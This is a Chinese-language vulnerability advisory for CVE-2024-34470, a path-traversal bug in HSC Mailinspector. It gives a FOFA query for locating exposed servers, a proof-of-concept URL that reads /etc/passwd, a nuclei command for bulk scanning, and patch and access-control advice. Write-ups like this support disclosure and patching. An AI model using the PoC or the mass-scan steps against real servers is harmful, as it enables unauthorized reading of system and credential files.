免责声明 本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。

目录

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

0x02漏洞复现

0x03漏洞分析

0x04修复建议

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

HSC Mailinspector 是一种邮件安全解决方案，旨在保护企业和组织免受各种电子邮件威胁的影响。它提供了一系列功能，包括针对垃圾邮件、恶意软件、垃圾邮件和其他网络威胁的过滤和检测。

在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之间发现了一个问题。在 /public/loader.php 文件中存在一个未经身份验证的路径遍历漏洞。path参数没有正确过滤传递的文件和目录是否属于 Web 根目录，这使得攻击者能够读取服务器上的任意文件。

受影响版本

HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影响。

CVE编号

CVE-2024-34470

0x02漏洞复现

fofa

body="mailinspector/public"

1.poc

https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

构造如上payload，将target-IP替换成目的IP，在浏览器或burp中打开，即可查看目标系统的文件。

2.批量检测poc

使用nuclei，下载地址：

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml

使用命令，nuclei.exe -t CVE-2024-34470.yaml -l 1.txt

0x03漏洞分析

这个漏洞的成因是在/public/loader.php文件中存在path参数没有正确过滤传递的文件和目录是否属于网络根目录，从而允许攻击者读取服务器上的任意文件。

0x04修复建议

1.目前厂商已发布升级补丁以修复漏洞，补丁获取链接:

https://hsclabs.com/mailinspector/

2.限制用户权限，避免授予过高的权限。

3.实施严格的访问控制和身份验证机制，以防止未经授权的访问